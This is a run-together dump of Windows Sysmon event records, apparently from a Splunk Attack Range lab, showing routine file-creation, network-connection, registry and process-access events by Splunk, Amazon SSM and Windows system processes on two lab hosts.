Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C2ADA09512160F2C0F325C91F75AD54,SHA256=5F6EB4D2EDA01D625BA73A0F3B80368F14D899037B9D70AE72FB18948092B6AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102916Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:17.138{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\surveyor-20211004072645-020MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102918Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:18.968{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D0DBB8182DA2C0366BEC5BD521AA1D8,SHA256=079DA38FD130DDB685F805A349E59F94FA9924613A8FD45F2F5BB8C8E51AA7DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080768Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:18.958{2FDD8D40-AC9A-615A-1200-00000000FD01}996NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=FD29EEB072DF679FC759E02D136165FA,SHA256=B27072B47776E65C0F87EC1213BDDEB8B412E33FCCD1955C07830B900D8FA1F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080767Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:18.786{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37DE7A5A90C4762B23F38B290B88344D,SHA256=15EDFE0B35826A2B8BD7AE521A028E5841124FE02EF6E5E329FB2D628256968D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080769Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:19.786{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF055EFC73BC5617197F75984726BD8B,SHA256=7CE50F1BD7BBC8956FE77E37C2CEE064D51BD89AE983B57EDE844562F6DC2289,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102920Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:19.968{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11E844553298E7939E63CA1DBDBA494C,SHA256=A5D71F089DF49C3B07D46C2294FD647E5510CCE115B0FBEC5B5BDAECB7943B3A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000102919Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:17.493{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49479-false10.0.1.12-8000- 23542300x800000000000000080770Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:20.786{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD7BCD9206B1CA6759CEFEEFECB157BF,SHA256=81BBC94CFACB7253305CC17F0607369DA1924316F646C70B66E88E1D85DAAF60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080772Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:21.786{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20080EB7B1FACC7BD9AF3BF32588BA91,SHA256=98A096063C70FC242D0682DC843141DA4E7FBC9EFDBF98EBA20F29C263695D97,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000080771Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:18.713{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local49984-false10.0.1.12-8000- 23542300x8000000000000000102921Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:20.999{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32A483CC87311B22057FB34F6E472533,SHA256=E37C96413EFA23591DCD4DDBD12FF2C581CB2EDCA820A1CA301DF5E796ED16AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080773Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:22.786{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=619BE1270214C281E7D2A7463FDA0681,SHA256=A49FFA4B138B5D2877A5DA2999BFD25A688E60755BE96670EF9CC9B18AEEC2FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102922Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:21.999{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1170B641D0AB19FD82FDB744696A3BD7,SHA256=D7BF04BD2B1FDD69D4B25EFCEA3B6B0F06D399A265F0A57CA177EB8DEF73C575,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080774Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:23.786{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02F929827ABB817E102EB2BD0A9D1E90,SHA256=EAD392D1C0A2905138E614F8B9781ADFFBAC5E6B8D72D69B9DD8D6BAE1E54EF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102923Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:23.048{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB94E83F00BE73549F6E2077963B2A59,SHA256=01F329E5E7CE116EA917B6002733002B7030F1CA95C66A6A354A2B13154E7360,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080775Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:24.801{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D521C7214F9014828B0B53958AF4CE32,SHA256=ED2D00A8CAF08DCBEFC9C8A3201C9792A5B3FADBC1920829F7AB5FEB2DB7430F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000102925Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:23.310{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49480-false10.0.1.12-8000- 23542300x8000000000000000102924Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:24.062{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB2BB4B7C0E20672D1631AA26C7563D4,SHA256=1529738B5735E9F33553A982BAA3F1D53FB56EB3FB768AD8474437E822605007,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080776Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:25.801{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF50384D21879FE0E1558ADDB7935C83,SHA256=99D2461C764F06F6EFE12A13BB6F242C34E32FA11DABC06C87A4C6AEE656B44D,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000102936Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:47:25.593{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000102935Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:47:25.593{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0013f39a) 13241300x8000000000000000102934Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:47:25.593{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b8eb-0xb0d36255) 13241300x8000000000000000102933Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:47:25.593{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b8f4-0x1297ca55) 13241300x8000000000000000102932Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:47:25.593{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b8fc-0x745c3255) 13241300x8000000000000000102931Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:47:25.593{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000102930Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:47:25.593{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0013f39a) 13241300x8000000000000000102929Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:47:25.593{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b8eb-0xb0d36255) 13241300x8000000000000000102928Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:47:25.593{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b8f4-0x1297ca55) 13241300x8000000000000000102927Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:47:25.593{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b8fc-0x745c3255) 23542300x8000000000000000102926Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:25.062{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9223B83061F5C102FD144BA825F9364B,SHA256=87EFBDA9860E19308A6C921AEC0C1FF2337E0B2BB068511E5D9AF4CC327CE329,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080778Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:26.801{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC8101ECA9171121E0F9717757084840,SHA256=A1EAE55B0CAF3D931B5E04291101EECBEFEF12305FC9EC615F1B50221D88DD5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102937Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:26.062{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C06C1A2E05D0DE5F9AA811AA3F15B4D2,SHA256=0F0CBBF12028C90688E92608FA57D497DF7794BCC2B2A7E1A6AF80C8A34C51FE,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000080777Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:23.791{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local49985-false10.0.1.12-8000- 23542300x800000000000000080779Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:27.801{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDB2F136C82874FBF8570A104E287523,SHA256=E773E6311E1876B25DB712ED5C6335D9638220F0510BA929023A56A6A33F4286,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102938Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:27.140{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F276AF2B19D18103ACA10D24999755E,SHA256=F23C916318FD5AE6C4633C78E83FF5BB50791E03030E0ADD27EE6918A25DC762,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080780Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:28.817{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DD8B8C3E6C06740871AAF834FD02183,SHA256=EF72F31F6ABE5891313124BBD2261310BA4908FFEB1AA0BC912F42756EF55623,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102939Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:28.156{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA54314C09C8FB2FCD2F6E41B815C8CE,SHA256=F86F5A414C776437EF52999B703335229F954DCCE27BDAC4485C8322E77BD433,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080782Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:29.817{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B127A5C3635FB79B8D56CE726501E887,SHA256=59233547E570FF3D23654E7BE070B892FC457A305944489D5A4660BC58142E0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102940Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:29.171{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D8CA3A400B2A21034470F456BB1661C,SHA256=11526BB0C3664D8A7B93AF1068657D8E899396C9436F20EB62B5B1B6848D5597,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080781Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:29.567{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080783Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:30.817{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2EBC640240ECB9AA8B4A1B887CDBD12,SHA256=98A93197EBCF7B5D58AF8086CE3CBDA893139FE2B6983821AC84514844BB7BAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102941Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:30.187{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C692B5E8349396153F7C131B6C53F2CD,SHA256=8E8AD40B526019DE3E88DDDD39AA938700B479D461DF3F6D66E247764E09C826,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000080798Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:29.119{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local49986-false10.0.1.12-8089- 23542300x800000000000000080797Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:31.817{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFF1DFF4344D907BEDA48F3A46F47B0E,SHA256=F3ED3EC9AF504263783FBA1CDF26EC641DE01E582584077504B1D21924E61F39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102943Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:31.187{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7671EB7494C3C929DE0F9B17A4DEE3BF,SHA256=5FEC20CEC3DA0D5FD6F6ED19450EBE9616A214A6BCE202F733C83DDF9A857278,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080796Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:31.458{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B193-615A-2D01-00000000FD01}2564C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080795Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:31.458{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080794Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:31.458{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080793Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:31.458{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080792Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:31.458{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080791Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 